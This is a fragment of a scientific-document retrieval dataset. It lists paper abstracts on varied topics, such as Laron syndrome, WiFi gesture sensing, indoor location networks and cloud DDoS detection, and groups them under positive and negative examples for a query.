"text": "In 1966 our group reported three siblings with clinical and biochemical features of GH deficiency but who had high serum GH levels [1] in the range of active acromegaly. Within 2 years we were able to collect 22 patients [4] all Oriental Jews. The first hypothesis that the defect is due to an abnormal GH molecule was disproved by finding that the circulating GH of these patients is normal by immunologic [5,6] and radioreceptor tests using GH receptors (GH-R) prepared from human liver membranes [7,8]. Growth hormone insensitivity was diagnosed by the low serum levels of insulin-like growth factor I (IGF-I) (at that time called somatomedin-C) in the presence of high endogenous GH levels and by the inability to generate IGF-I by the administration of exogenous hGH [9,10]. The cause of the GH resistance was also demonstrated by our group in 1984 by showing that GH-R prepared from liver membranes obtained by biopsies from two patients with LS did not bind radio-labelled human GH [11]. The subsequent cloning by Leung et al., of the GH-R [12], its characterization by Godowski et al. of the GH-R [13] and the introduction of new techniques in molecular biology enabled the localization of the molecular defects of the GH receptor gene. Geographical distribution and genetic aspects Since the first description of patients with LS in Israel of Oriental Jewish origin (Yemen, Iran, Afghanistan, Middle East and North Africa [1,4,14], more and more patients have been diagnosed both in our and other countries, the majority originating in the Mediterranean area, of North African, Spanish or Italian origin and Middle East of Jewish, Arab, Turkish, Iranian or Pakistani origin or in descendants of subjects originating from these regions. A large genetic isolate has been reported from Ecuador [15] suspected to have originated from Jewish conversos fleeing the Spanish Inquisition, and a smaller one in the Bahamas [16]. There are also numerous patients in Turkey [17], Pakistan and India [18,19]. In most of the above populations consanguinity was or is still in practice. Isolated patients not of Mediterranean or Oriental descent have been reported from Denmark, The Netherlands, Slovakia, Russia, Slovenia, Japan and the USA. A more detailed listing appears in recent reviews of this syndrome [20–22]. At present many hundreds of patients have been diagnosed and the number increases constantly. Analysis of the Israeli cohort led to the conclusion that Laron syndrome is caused by an autosomal fully penetrant recessive mechanism [23].",
"title": ""
},
{
"docid": "2b3de55ff1733fac5ee8c22af210658a",
"text": "With faster connection speed, Internet users are now making social network a huge reservoir of texts, images and video clips (GIF). Sentiment analysis for such online platform can be used to predict political elections, evaluates economic indicators and so on. However, GIF sentiment analysis is quite challenging, not only because it hinges on spatio-temporal visual contentabstraction, but also for the relationship between such abstraction and final sentiment remains unknown.In this paper, we dedicated to find outsuch relationship.We proposed a SentiPairSequence basedspatiotemporal visual sentiment ontology, which forms the midlevel representations for GIFsentiment. The establishment process of SentiPair contains two steps. First, we construct the Synset Forest to define the semantic tree structure of visual sentiment label elements. Then, through theSynset Forest, we organically select and combine sentiment label elements to form a mid-level visual sentiment representation. Our experiments indicate that SentiPair outperforms other competing mid-level attributes. Using SentiPair, our analysis frameworkcan achieve satisfying prediction accuracy (72.6%). We also opened ourdataset (GSO-2015) to the research community. GSO-2015 contains more than 6,000 manually annotated GIFs out of more than 40,000 candidates. Each is labeled with both sentiment and SentiPair Sequence.",
"title": ""
},
{
"docid": "aa749c00010e5391710738cc235c1c35",
"text": "Traditional summarization initiatives have been focused on specific types of documents such as articles, reviews, videos, image feeds, or tweets, a practice which may result in pigeonholing the summarization task in the context of modern, content-rich multimedia collections. Consequently, much of the research to date has revolved around mostly toy problems in narrow domains and working on single-source media types. We argue that summarization and story generation systems need to refocus the problem space in order to meet the information needs in the age of user-generated content in di↵erent formats and languages. Here we create a framework for flexible multimedia storytelling. Narratives, stories, and summaries carry a set of challenges in big data and dynamic multi-source media that give rise to new research in spatial-temporal representation, viewpoint generation, and explanation.",
"title": ""
},
{
"docid": "b51f3871cf5354c23e5ffd18881fe951",
"text": "As the Internet grows in importance, concerns about online privacy have arisen. We describe the development and validation of three short Internet-administered scales measuring privacy related attitudes ('Privacy Concern') and behaviors ('General Caution' and 'Technical Protection'). Internet Privacy Scales 1 In Press: Journal of the American Society for Information Science and Technology UNCORRECTED proofs. This is a preprint of an article accepted for publication in Journal of the American Society for Information Science and Technology copyright 2006 Wiley Periodicals, Inc. Running Head: INTERNET PRIVACY SCALES Development of measures of online privacy concern and protection for use on the",
"title": ""
},
{
"docid": "df5c5fbdb279644a43dee243f586bf78",
"text": "Previous research has usually assumed that shopping on-line is a goal-oriented activity and is motivated by extrinsic factors of the customers. On the other hand, intrinsic factors, such as entertainment, have been found to be a major reason for peoples to use the Internet. This study examined whether such intrinsic motivations can be used to explain consumers’ acceptance of on-line shopping. A theoretical model, based on the technology acceptance model, was proposed to describe the intrinsic and extrinsic motivations of consumers to shop on-line. Results of this empirical study showed that perceived usefulness is not an antecedent of on-line shopping, while fashion and a cognitive absorption experiences on the web were more important than their extrinsic factors in explaining on-line consuming behavior. Implications and limitations were discussed. # 2003 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "77502699d31b0bb13f6070756054fc2d",
"text": "This thesis evaluates the integrated information theory (IIT) by looking at how it may answer some central problems of consciousness that the author thinks any theory of consciousness should be able to explain. The problems concerned are the mind-body problem, the hard problem, the explanatory gap, the binding problem, and the problem of objectively detecting consciousness. The IIT is a computational theory of consciousness thought to explain the rise of consciousness. First the mongrel term consciousness is defined to give a clear idea of what is meant by consciousness in this thesis; followed by a presentation of the IIT, its origin, main ideas, and some implications of the theory. Thereafter the problems of consciousness will be presented, and the explanation the IIT gives will be investigated. In the discussion, some not perviously—in the thesis—discussed issues regarding the theory will be lifted. The author finds the IIT to hold explanations to each of the problems discussed. Whether the explanations are satisfying is questionable. Keywords: integrated information theory, phenomenal consciousness, subjective experience, mind-body, the hard problem, binding, testing
AN EVALUATION OF THE IIT !4 Table of Content Introduction 5 Defining Consciousness 6 Introduction to the Integrated Information Theory 8 Historical Background 8 The Approach 9 The Core of the IIT 9 Axioms 11 Postulates 13 The Conscious Mechanism of the IIT 15 Some Key Terms of the IIT 17 The Central Identity of the IIT 19 Some Implications of the IIT 20 Introduction to the Problems of Consciousness 25 The Mind-Body Problem 25 The Hard Problem 27 The Explanatory Gap 28 The Problem With the Problems Above 28 The Binding Problem 30 The Problem of Objectively Detecting Consciousness 31 Evaluation of the IIT Against the Problems of Consciousness 37 The Mind-Body Problem vs. the IIT 38 The Hard Problem vs. the IIT 40 The Explanatory Gap vs. the IIT 42 The Binding Problem vs. the IIT 43 The Problem of Objectively Detecting Consciousness 45 Discussion 50 Conclusion 53 References 54 AN EVALUATION OF THE IIT !5 Introduction Intuitively we like to believe that things which act and behave similarly to ourselves are conscious, things that interact with us on our terms, mimic our facial and bodily expressions, and those that we feel empathy for. But what about things that are superficially different from us, such as other animals and insects, bacteria, groups of people, humanoid robots, the Internet, self-driving cars, smartphones, or grey boxes which show no signs of interaction with their environment? Is it possible that intuition and theory of mind (ToM) may be misleading; that one wrongly associate consciousness with intelligence, human-like behaviour, and ability to react on stimuli? Perhaps we attribute consciousness to things that are not conscious, and that we miss to attribute it to things that really have vivid experiences. To address this question, many theories have been proposed that aim at explaining the emergence of consciousness and to give us tools to identify wherever consciousness may occur. The integrated information theory (IIT) (Tononi, 2004), is one of them. It originates in the dynamic core theory (Tononi & Edelman, 1998) and claims that consciousness is the same as integrated information. While some theories of consciousness only attempt to explain consciousness in neurobiological systems, the IIT is assumed to apply to non-biological systems. Parthemore and Whitby (2014) raise the concern that one may be tempted to reduce consciousness to some quantity X, where X might be e.g. integrated information, neural oscillations (the 40 Hz theory, Crick & Koch, 1990), etc. A system that models one of those theories may prematurely be believed to be conscious argue Parthemore and Whitby (2014). This tendency has been noted among researchers of machine consciousness, of some who have claimed their systems to have achieved at least minimal consciousness (Gamez, 2008a). The aim of this thesis is to take a closer look at the IIT and see how it responds to some of the major problems of consciousness. The focus will be on the mechanisms which AN EVALUATION OF THE IIT !6 the IIT hypothesises gives rise to conscious experience (Oizumi, Albantakis, & Tononi, 2014a), and how it corresponds to those identified by cognitive neurosciences. This thesis begins by offering a working definition of consciousness; that gives a starting point for what we are dealing with. Then it continues with an introduction to the IIT, which is the main focus of this thesis. I have tried to describe the theory in my own words, where some of more complex details not necessary for my argument are left out. I have taken some liberties in adapting the terminology to fit better with what I find elsewhere in cognitive neurosciences and consciousness science avoiding distorting the theory. Thereafter follows the problems of consciousness, which a theory of consciousness, such as IIT, should be able to explain. The problems explored in this thesis are the mind-body problem, the hard problem, the explanatory gap, the binding problem and the problem of objectively detecting consciousness. Each problem is used to evaluate the theory by looking at what explanations the theory is providing. Defining Consciousness What is this thing that is called consciousness and what does it mean to be conscious? Science doesn’t seem to provide with one clear definition of consciousness (Cotterill, 2003; Gardelle & Kouider, 2009; Revonsuo, 2010). When lay people talk about consciousness and being conscious they commonly refer to being attentive and aware and having intentions (Malle, 2009). Both John Searle (1990) and Giulio Tononi (Tononi, 2008, 2012a; Oizumi et al., 2014a) refer to consciousness as the thing that disappears when falling into dreamless sleep, or otherwise become unconscious, and reappears when we wake up or begin to dream. The problem with defining the term consciousness is that it seems to point to many different kinds of phenomena (Block, 1995). In an attempt to point it out and pin it down, the AN EVALUATION OF THE IIT !7 usage of the term needs to be narrowed down to fit the intended purpose. Cognition and neuroscientists alike commonly use terms such as non-conscious, unconscious, awake state, lucid dreaming, etc. which all refer to the subjective experience, but of different degrees, levels, and states (Revonsuo, 2009). Commonly used in discussions regarding consciousness are also terms such as reflective consciousness, self-consciousness, access consciousness, and functional consciousness. Those terms have little to do with the subjective experience per se, at best they describe some of the content of an experience, but mostly refer to observed behaviour (Block, 1995). It seems that researchers of artificial machine consciousness often steer away from the subjective experience. Instead, they focus on the use, the functions, and the expressions of consciousness, as it may be perceived by a third person (Gamez, 2008a). In this thesis, the term consciousness is used for the phenomenon of subjective experience, per se. It is what e.g. differs the awake state from dreamless sleep. It is what differs one’s own conscious thought processes from a regular computer’s nonconscious information processing, or one’s mindful thought from unconscious sensory-motoric control and automatic responses. It is what is lost during anaesthesia and epileptic seizures. Without consciousness, there wouldn’t be “something it is like to be” (Nagel, 1974, p. 436) and there would be no one there to experience the world (Tononi, 2008). Without it we would not experience anything. We would not even regard ourselves to be alive. It is the felt raw experience, even before it is attended to, considered and possible to report, i.e. what Block (1995) refers to as phenomenal consciousness. This is also often the starting point of cognitive and neurological theories of consciousness, which try to explain how experience emerge within the brain by exploring the differences between conscious and nonconscious states and processes. AN EVALUATION OF THE IIT !8 Introduction to the Integrated Information Theory Integrated information measures how much can be distinguished by the whole above and beyond its parts, and Φ is its symbol. A complex is where Φ reaches its maximum, and therein lives one consciousness—a single entity of experience. (Tononi, 2012b, p. 172) Historical Background The integrated information theory originates in the collected ideas of Tononi, Sporns, and Edelman (1992, 1994). In their early collaborative work, they developed a reentering model of visual binding which considered cortico-cortical connections as the basis for integration (Tononi et al., 1992). Two years later they presented a measure hypothesised to describe the neural complexity of functional integration in the brain (Tononi et al., 1994). The ideas of the reentering model and neural complexity measure developed into the more known dynamic core hypothesis (DCH) of the neural substrate of consciousness (Tononi & Edelman, 1998). The thalamocortical pathways played the foundation of sensory modality integration. In the DCH, a measure of integration based on entropy was introduced, which later became Φ, the measurement of integrated information (Tononi & Sporns, 2003). This laid the foundation for the information integration theory of consciousness (Tononi, 2004). The IIT is under constant development and has since it first was presented undergone three major revisions. The latest, at the time of writing, is referred to as version 3.0 (Oizumi et al., 2014a), which this thesis mostly relies on. The basic philosophical and theoretical assumptions have been preserved throughout the development of the theory. Some of the terminology and mathematics have changed between the versions (Oizumi, Amari, Yanagawa, Fujii, & Tsuchiya, 2015). Axioms and p",
"title": ""
},
{
"docid": "69624e1501b897bf1a9f9a5a84132da3",
"text": "360° videos and Head-Mounted Displays (HMDs) are geing increasingly popular. However, streaming 360° videos to HMDs is challenging. is is because only video content in viewers’ Fieldof-Views (FoVs) is rendered, and thus sending complete 360° videos wastes resources, including network bandwidth, storage space, and processing power. Optimizing the 360° video streaming to HMDs is, however, highly data and viewer dependent, and thus dictates real datasets. However, to our best knowledge, such datasets are not available in the literature. In this paper, we present our datasets of both content data (such as image saliency maps and motion maps derived from 360° videos) and sensor data (such as viewer head positions and orientations derived from HMD sensors). We put extra eorts to align the content and sensor data using the timestamps in the raw log les. e resulting datasets can be used by researchers, engineers, and hobbyists to either optimize existing 360° video streaming applications (like rate-distortion optimization) and novel applications (like crowd-driven cameramovements). We believe that our dataset will stimulate more research activities along this exciting new research direction. ACM Reference format: Wen-Chih Lo, Ching-Ling Fan, Jean Lee, Chun-Ying Huang, Kuan-Ta Chen, and Cheng-Hsin Hsu. 2017. 360° Video Viewing Dataset in Head-Mounted Virtual Reality. In Proceedings ofMMSys’17, Taipei, Taiwan, June 20-23, 2017, 6 pages. DOI: hp://dx.doi.org/10.1145/3083187.3083219 CCS Concept • Information systems→Multimedia streaming",
"title": ""
},
{
"docid": "7660ad596801203d1c9d1635be6b90d9",
"text": "a r t i c l e i n f o This study investigates the role of dynamic capabilities in the resource-based view framework, and also explores the relationships among different resources, different dynamic capabilities and firm performance. Employing samples of top 1000 Taiwanese companies, the findings show that dynamic capabilities can mediate the firm's valuable, rare, inimitable and non-substitutable (VRIN) resources to improve performance. On the contrary, non-VRIN resources have an insignificant mediating effect. Among three types of dynamic capabilities, dynamic learning capability most effectively mediates the influence of VRIN resources on performance. Furthermore, the important role of VRIN resources is addressed because of their direct effects on performance based on RBV, as well as their indirect effect via the mediation of dynamic capabilities.",
"title": ""
},
{
"docid": "d8da6bebb1ca8f00b176e1493ded4b9c",
"text": "This paper presents an efficient technique for the evaluation of different types of losses in substrate integrated waveguide (SIW). This technique is based on the Boundary Integral-Resonant Mode Expansion (BI-RME) method in conjunction with a perturbation approach. This method also permits to derive automatically multimodal and parametric equivalent circuit models of SIW discontinuities, which can be adopted for an efficient design of complex SIW circuits. Moreover, a comparison of losses in different types of planar interconnects (SIW, microstrip, coplanar waveguide) is presented.",
"title": ""
},
{
"docid": "f29342c97fadce870036a9393c8d9872",
"text": "It has become a popular trend in using metallic housing for mobile phone. The metallic housing often posts a great challenge towards the design of internal antenna which is used commonly in mobile devices. As such, it has become a common practice that most will integrate the metallic housing as part of the antenna for the mobile phone. This paper presents an antenna solution for mobile phone with a metallic back cover. The antenna solution is for the Main Antenna operating at several frequency bands in the range of 700–960MHz, 1710–2170MHz, 2300–2400MHz as well as 2500–2690MHz, which cover the GSM850, GSM900, DCS1800, PCS1900, WCDMA2100, and various LTE Bands in the 4G cellular network. The antenna solution presented in this paper, demonstrates the use of tunable component, integrating with the metallic housing to provide flexible tuning to cover the various frequency spectrums in the 2G, 3G and 4G cellular network.",
"title": ""
},
{
"docid": "7a033c2bedf107dfbd92887eaa4ae8c0",
"text": "Building high-performance virtual machines is a complex and expensive undertaking; many popular languages still have low-performance implementations. We describe a new approach to virtual machine (VM) construction that amortizes much of the effort in initial construction by allowing new languages to be implemented with modest additional effort. The approach relies on abstract syntax tree (AST) interpretation where a node can rewrite itself to a more specialized or more general node, together with an optimizing compiler that exploits the structure of the interpreter. The compiler uses speculative assumptions and deoptimization in order to produce efficient machine code. Our initial experience suggests that high performance is attainable while preserving a modular and layered architecture, and that new high-performance language implementations can be obtained by writing little more than a stylized interpreter.",
"title": ""
}
] | scidocsrr |
37b1c6988b75cc79fd233a31ee8be06f | WiGest: A ubiquitous WiFi-based gesture recognition system | [
{
"docid": "3f1967d87d14a1ee652760929ed217d0",
"text": "Existing location-based social networks (LBSNs), e.g. Foursquare, depend mainly on GPS or network-based localization to infer users' locations. However, GPS is unavailable indoors and network-based localization provides coarse-grained accuracy. This limits the accuracy of current LBSNs in indoor environments, where people spend 89% of their time. This in turn affects the user experience, in terms of the accuracy of the ranked list of venues, especially for the small-screens of mobile devices; misses business opportunities; and leads to reduced venues coverage.\n In this paper, we present CheckInside: a system that can provide a fine-grained indoor location-based social network. CheckInside leverages the crowd-sensed data collected from users' mobile devices during the check-in operation and knowledge extracted from current LBSNs to associate a place with its name and semantic fingerprint. This semantic fingerprint is used to obtain a more accurate list of nearby places as well as automatically detect new places with similar signatures. A novel algorithm for handling incorrect check-ins and inferring a semantically-enriched floorplan is proposed as well as an algorithm for enhancing the system performance based on the user implicit feedback.\n Evaluation of CheckInside in four malls over the course of six weeks with 20 participants shows that it can provide the actual user location within the top five venues 99% of the time. This is compared to 17% only in the case of current LBSNs. In addition, it can increase the coverage of current LBSNs by more than 25%.",
"title": ""
},
{
"docid": "21dd7b4582f71d678b5592a547d9e730",
"text": "The existence of a worldwide indoor floorplans database can lead to significant growth in location-based applications, especially for indoor environments. In this paper, we present CrowdInside: a crowdsourcing-based system for the automatic construction of buildings floorplans. CrowdInside leverages the smart phones sensors that are ubiquitously available with humans who use a building to automatically and transparently construct accurate motion traces. These accurate traces are generated based on a novel technique for reducing the errors in the inertial motion traces by using the points of interest in the indoor environment, such as elevators and stairs, for error resetting. The collected traces are then processed to detect the overall floorplan shape as well as higher level semantics such as detecting rooms and corridors shapes along with a variety of points of interest in the environment.\n Implementation of the system in two testbeds, using different Android phones, shows that CrowdInside can detect the points of interest accurately with 0.2% false positive rate and 1.3% false negative rate. In addition, the proposed error resetting technique leads to more than 12 times enhancement in the median distance error compared to the state-of-the-art. Moreover, the detailed floorplan can be accurately estimated with a relatively small number of traces. This number is amortized over the number of users of the building. We also discuss possible extensions to CrowdInside for inferring even higher level semantics about the discovered floorplans.",
"title": ""
}
] | [
{
"docid": "6bb1914cbbaf0ba27a8ab52dbec2152a",
"text": "This paper presents a novel local feature for 3D range image data called `the line image'. It is designed to be highly viewpoint invariant by exploiting the range image to efficiently detect 3D occupancy, producing a representation of the surface, occlusions and empty spaces. We also propose a strategy for defining keypoints with stable orientations which define regions of interest in the scan for feature computation. The feature is applied to the task of object classification on sparse urban data taken with a Velodyne laser scanner, producing good results.",
"title": ""
},
{
"docid": "effa64c878add2a55a804415cb7c8169",
"text": "Dimensionality reduction is an important issue in many machine learning and pattern recognition applications, and the trace ratio (TR) problem is an optimization problem involved in many dimensionality reduction algorithms. Conventionally, the solution is approximated via generalized eigenvalue decomposition due to the difficulty of the original problem. However, prior works have indicated that it is more reasonable to solve it directly than via the conventional way. In this brief, we propose a theoretical overview of the global optimum solution to the TR problem via the equivalent trace difference problem. Eigenvalue perturbation theory is introduced to derive an efficient algorithm based on the Newton-Raphson method. Theoretical issues on the convergence and efficiency of our algorithm compared with prior literature are proposed, and are further supported by extensive empirical results.",
"title": ""
},
{
"docid": "7912241009e05de6af4e41aa2f48a1ec",
"text": "CONTEXT/OBJECTIVE\nNot much is known about the implication of adipokines and different cytokines in gestational diabetes mellitus (GDM) and macrosomia. The purpose of this study was to assess the profile of these hormones and cytokines in macrosomic babies, born to gestational diabetic women.\n\n\nDESIGN/SUBJECTS\nA total of 59 women (age, 19-42 yr) suffering from GDM with their macrosomic babies (4.35 +/- 0.06 kg) and 60 healthy age-matched pregnant women and their newborns (3.22 +/- 0.08 kg) were selected.\n\n\nMETHODS\nSerum adipokines (adiponectin and leptin) were quantified using an obesity-related multiple ELISA microarray kit. The concentrations of serum cytokines were determined by ELISA.\n\n\nRESULTS\nSerum adiponectin levels were decreased, whereas the concentrations of leptin, inflammatory cytokines, such as IL-6 and TNF-alpha, were significantly increased in gestational diabetic mothers compared with control women. The levels of these adipocytokines were diminished in macrosomic babies in comparison with their age-matched control newborns. Serum concentrations of T helper type 1 (Th1) cytokines (IL-2 and interferon-gamma) were decreased, whereas IL-10 levels were significantly enhanced in gestational diabetic mothers compared with control women. Macrosomic children exhibited high levels of Th1 cytokines and low levels of IL-10 compared with control infants. Serum IL-4 levels were not altered between gestational diabetic mothers and control mothers or the macrosomic babies and newborn control babies.\n\n\nCONCLUSIONS\nGDM is linked to the down-regulation of adiponectin along with Th1 cytokines and up-regulation of leptin and inflammatory cytokines. Macrosomia was associated with the up-regulation of Th1 cytokines and the down-regulation of the obesity-related agents (IL-6 and TNF-alpha, leptin, and adiponectin).",
"title": ""
},
{
"docid": "7678163641a37a02474bd42a48acec16",
"text": "Thiopurine S-methyltransferase (TPMT) is involved in the metabolism of thiopurine drugs. Patients that due to genetic variation lack this enzyme or have lower levels than normal, can be adversely affected if normal doses of thiopurines are prescribed. The evidence for measuring TPMT prior to starting patients on thiopurine drug therapy has been reviewed and the various approaches to establishing a service considered. Until recently clinical guidelines on the use of the TPMT varied by medical specialty. This has now changed, with clear guidance encouraging clinicians to use the TPMT test prior to starting any patient on thiopurine therapy. The TPMT test is the first pharmacogenomic test that has crossed from research to routine use. Several analytical approaches can be taken to assess TPMT status. The use of phenotyping supported with genotyping on selected samples has emerged as the analytical model that has enabled national referral services to be developed to a high level in the UK. The National Health Service now has access to cost-effective and timely TPMT assay services, with two laboratories undertaking the majority of the work at national level and with several local services developing. There appears to be adequate capacity and an appropriate internal market to ensure that TPMT assay services are commensurate with the clinical demand.",
"title": ""
},
{
"docid": "901fa78a4d06c365d13169859caeae69",
"text": "Although the number of cloud projects has dramatically increased over the last few years, ensuring the availability and security of project data, services, and resources is still a crucial and challenging research issue. Distributed denial of service (DDoS) attacks are the second most prevalent cybercrime attacks after information theft. DDoS TCP flood attacks can exhaust the cloud’s resources, consume most of its bandwidth, and damage an entire cloud project within a short period of time. The timely detection and prevention of such attacks in cloud projects are therefore vital, especially for eHealth clouds. In this paper, we present a new classifier system for detecting and preventing DDoS TCP flood attacks (CS_DDoS) in public clouds. The proposed CS_DDoS system offers a solution to securing stored records by classifying the incoming packets and making a decision based on the classification results. During the detection phase, the CS_DDOS identifies and determines whether a packet is normal or originates from an attacker. During the prevention phase, packets, which are classified as malicious, will be denied to access the cloud service and the source IP will be blacklisted. The performance of the CS_DDoS system is compared using the different classifiers of the least squares support vector machine (LS-SVM), naïve Bayes, K-nearest, and multilayer perceptron. The results show that CS_DDoS yields the best performance when the LS-SVM classifier is adopted. It can detect DDoS TCP flood attacks with about 97% accuracy and with a Kappa coefficient of 0.89 when under attack from a single source, and 94% accuracy with a Kappa coefficient of 0.9 when under attack from multiple attackers. Finally, the results are discussed in terms of accuracy and time complexity, and validated using a K-fold cross-validation model.",
"title": ""
},
{
"docid": "82592f60e0039089e3c16d9534780ad5",
"text": "A model for grey-tone image enhancement using the concept of fuzzy sets is suggested. It involves primary enhancement, smoothing, and then final enhancement. The algorithm for both the primary and final enhancements includes the extraction of fuzzy properties corresponding to pixels and then successive applications of the fuzzy operator \"contrast intensifier\" on the property plane. The three different smoothing techniques considered in the experiment are defocussing, averaging, and max-min rule over the neighbors of a pixel. The reduction of the \"index of fuzziness\" and \"entropy\" for different enhanced outputs (corresponding to different values of fuzzifiers) is demonstrated for an English script input. Enhanced output as obtained by histogram modification technique is also presented for comparison.",
"title": ""
},
{
"docid": "32bb1110b3f30617e8a29a346c893e56",
"text": "Article history: Available online 3 May 2016",
"title": ""
},
{
"docid": "f554af0d260de70f6efbc8fe8d64a357",
"text": "Hypocretin deficiency causes narcolepsy and may affect neuroendocrine systems and body composition. Additionally, growth hormone (GH) alterations my influence weight in narcolepsy. Symptoms can be treated effectively with sodium oxybate (SXB; γ-hydroxybutyrate) in many patients. This study compared growth hormone secretion in patients and matched controls and established the effect of SXB administration on GH and sleep in both groups. Eight male hypocretin-deficient patients with narcolepsy and cataplexy and eight controls matched for sex, age, BMI, waist-to-hip ratio, and fat percentage were enrolled. Blood was sampled before and on the 5th day of SXB administration. SXB was taken two times 3 g/night for 5 consecutive nights. Both groups underwent 24-h blood sampling at 10-min intervals for measurement of GH concentrations. The GH concentration time series were analyzed with AutoDecon and approximate entropy (ApEn). Basal and pulsatile GH secretion, pulse regularity, and frequency, as well as ApEn values, were similar in patients and controls. Administration of SXB caused a significant increase in total 24-h GH secretion rate in narcolepsy patients, but not in controls. After SXB, slow-wave sleep (SWS) and, importantly, the cross-correlation between GH levels and SWS more than doubled in both groups. In conclusion, SXB leads to a consistent increase in nocturnal GH secretion and strengthens the temporal relation between GH secretion and SWS. These data suggest that SXB may alter somatotropic tone in addition to its consolidating effect on nighttime sleep in narcolepsy. This could explain the suggested nonsleep effects of SXB, including body weight reduction.",
"title": ""
},
{
"docid": "5284157f83c2fe578746b9ae3f6ad429",
"text": "SLOWbot is a research project conducted via a collaboration between iaso health and FBK (Fondazione Bruno Kessler). There are now thousands of available healthy aging apps, but most don't deliver on their promise to support a healthy aging process in people that need it the most. The neediest include the over-fifties age group, particularly those wanting to prevent the diseases of aging or whom already have a chronic disease. Even the motivated \"quantified selfers\" discard their health apps after only a few months. Our research aims to identify new ways to ensure adherence to a healthy lifestyle program tailored for an over fifties audience which is delivered by a chatbot. The research covers the participant onboarding process and examines barriers and issues with gathering predictive data that might inform future improved uptake and adherence as well as an increase in health literacy by the participants. The healthy lifestyle program will ultimately be delivered by our \"SLOWbot\" which guides the participant to make informed and enhanced health decision making, specifically around food choices (a \"longevity eating plan\").",
"title": ""
},
{
"docid": "097c9810e636b9cc3ec274ef6c30333d",
"text": "Emotion Recognition has expanding significance in helping human-PC collaboration issues. It is a difficult task to understand how other people feel but it becomes even worse to perceive these emotions through a computer. With the advancement in technology and increase in application of artificial intelligence, it has become a necessity to automatically recognize the emotions of the user for the human-computer interactions. The need for emotion recognition keeps increasing and it has become applicable in various fields now days. This paper explores the way to recognize different human emotions from our body through wireless signals.",
"title": ""
},
{
"docid": "bdbbe079493bbfec7fb3cb577c926997",
"text": "A large amount of information on the Web is contained in regularly structured objects, which we call data records. Such data records are important because they often present the essential information of their host pages, e.g., lists of products or services. It is useful to mine such data records in order to extract information from them to provide value-added services. Existing automatic techniques are not satisfactory because of their poor accuracies. In this paper, we propose a more effective technique to perform the task. The technique is based on two observations about data records on the Web and a string matching algorithm. The proposed technique is able to mine both contiguous and non-contiguous data records. Our experimental results show that the proposed technique outperforms existing techniques substantially.",
"title": ""
},
{
"docid": "c4e739d4307ef69b39fe9bc588b254c2",
"text": "Virtualized Radio Access Network (vRAN) architectures constitute a promising solution for the densification needs of 5G networks, as they decouple Base Stations (BUs) functions from Radio Units (RUs) allowing the processing power to be pooled at cost-efficient Central Units (CUs). vRAN facilitates the flexible function relocation (split selection), and therefore enables splits with less stringent network requirements compared to state-of-the-art fully Centralized (C-RAN) systems. In this paper, we study the important and challenging vRAN design problem. We propose a novel modeling approach and a rigorous analytical framework, FluidRAN, that minimizes RAN costs by jointly selecting the splits and the RUs-CUs routing paths. We also consider the increasingly relevant scenario where the RAN needs to support multi-access edge computing (MEC) services, that naturally favor distributed RAN (D-RAN) architectures. Our framework provides a joint vRAN/MEC solution that minimizes operational costs while satisfying the MEC needs. We follow a data-driven evaluation method, using topologies of 3 operational networks. Our results reveal that (i) pure C-RAN is rarely a feasible upgrade solution for existing infrastructure, (ii) FluidRAN achieves significant cost savings compared to D-RAN systems, and (iii) MEC can increase substantially the operator's cost as it pushes vRAN function placement back to RUs.",
"title": ""
},
{
"docid": "4610f713a43c291217a6a356518572bd",
"text": "Government and institutionally-driven reforms focused on quality teaching and learning in universities emphasize the importance of developing replicable, scalable teaching approaches that can be evaluated. In this context, learning design and learning analytics are two fields of research that may help university teachers design quality learning experiences for their students, evaluate how students are learning within that intended learning context and support personalized learning experiences for students. Learning Designs are ways of describing an educational experience such that it can be applied across a range of disciplinary contexts. Learning analytics offers new approaches to investigating the data associated with a learner's experience. This paper explores the relationship between learning designs and learning analytics.",
"title": ""
},
{
"docid": "e43ef4701689c1a8a03a6b2e391593bb",
"text": "Years of attraction research have established several \"principles\" of attraction with robust evidence. However, a major limitation of previous attraction studies is that they have almost exclusively relied on well-controlled experiments, which are often criticized for lacking ecological validity. The current research was designed to examine initial attraction in a real-life setting-speed-dating. Social Relations Model analyses demonstrated that initial attraction was a function of the actor, the partner, and the unique dyadic relationship between these two. Meta-analyses showed intriguing sex differences and similarities. Self characteristics better predicted women's attraction than they did for men, whereas partner characteristics predicted men's attraction far better than they did for women. The strongest predictor of attraction for both sexes was partners' physical attractiveness. Finally, there was some support for the reciprocity principle but no evidence for the similarity principle.",
"title": ""
},
{
"docid": "e4c3735b0f89fa35704a46204d79638f",
"text": "Recurrent Neural Networks (RNNs) have been widely used in natural language processing and computer vision. Among them, the Hierarchical Multi-scale RNN (HM-RNN), a kind of multi-scale hierarchical RNN proposed recently, can learn the hierarchical temporal structure from data automatically. In this paper, we extend the work to solve the computer vision task of action recognition. However, in sequence-to-sequence models like RNN, it is normally very hard to discover the relationships between inputs and outputs given static inputs. As a solution, attention mechanism could be applied to extract the relevant information from input thus facilitating the modeling of inputoutput relationships. Based on these considerations, we propose a novel attention network, namely Hierarchical Multi-scale Attention Network (HM-AN), by combining the HM-RNN and the attention mechanism and apply it to action recognition. A newly proposed gradient estimation method for stochastic neurons, namely Gumbel-softmax, is exploited to implement the temporal boundary detectors and the stochastic hard attention mechanism. To amealiate the negative effect of sensitive temperature of the Gumbel-softmax, an adaptive temperature training method is applied to better the system performance. The experimental results demonstrate the improved effect of HM-AN over LSTM with attention on the vision task. Through visualization of what have been learnt by the networks, it can be observed that both the attention regions of images and the hierarchical temporal structure can be captured by HM-AN.",
"title": ""
},
{
"docid": "cf0d0d6895a5e5fbe1eb72e82b4d8b4b",
"text": "PURPOSE\nThe purpose of this study was twofold: (a) to determine the prevalence of compassion satisfaction, compassion fatigue, and burnout in emergency department nurses throughout the United States and (b) to examine which demographic and work-related components affect the development of compassion satisfaction, compassion fatigue, and burnout in this nursing specialty.\n\n\nDESIGN AND METHODS\nThis was a nonexperimental, descriptive, and predictive study using a self-administered survey. Survey packets including a demographic questionnaire and the Professional Quality of Life Scale version 5 (ProQOL 5) were mailed to 1,000 selected emergency nurses throughout the United States. The ProQOL 5 scale was used to measure the prevalence of compassion satisfaction, compassion fatigue, and burnout among emergency department nurses. Multiple regression using stepwise solution was employed to determine which variables of demographics and work-related characteristics predicted the prevalence of compassion satisfaction, compassion fatigue, and burnout. The α level was set at .05 for statistical significance.\n\n\nFINDINGS\nThe results revealed overall low to average levels of compassion fatigue and burnout and generally average to high levels of compassion satisfaction among this group of emergency department nurses. The low level of manager support was a significant predictor of higher levels of burnout and compassion fatigue among emergency department nurses, while a high level of manager support contributed to a higher level of compassion 